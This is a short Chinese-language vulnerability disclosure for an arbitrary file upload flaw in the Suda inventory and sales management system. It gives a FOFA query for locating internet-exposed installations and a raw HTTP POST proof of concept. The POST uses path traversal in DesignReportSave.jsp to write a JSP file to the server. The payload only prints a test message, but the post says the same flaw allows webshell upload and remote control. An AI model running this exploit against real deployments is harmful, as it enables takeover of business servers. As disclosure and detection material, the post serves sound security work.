速达进存销管理系统是一套完整的企业业务管理系统,统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体,有着极好易用性和实用性,全面提升了企业的管理能力和工作效率。由于速达软件技术(广州)有限公司开发。
该系统存在任意文件上传漏洞,通过此漏洞攻击者可上传webshell木马,远程控制服务器。
fofa查询
app="速达软件-公司产品"
POC
POST /report/DesignReportSave.jsp?report=../check.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 54
<% out.print("This website has a vulnerability!!!");%>
上传成功后,访问路径 :/check.jsp 返回如下,则漏洞存在
nuclei检测
pocsuite3检测
漏洞检测脚本已上传免费漏洞库
地址:
https://github.com/Vme18000yuan/FreePOC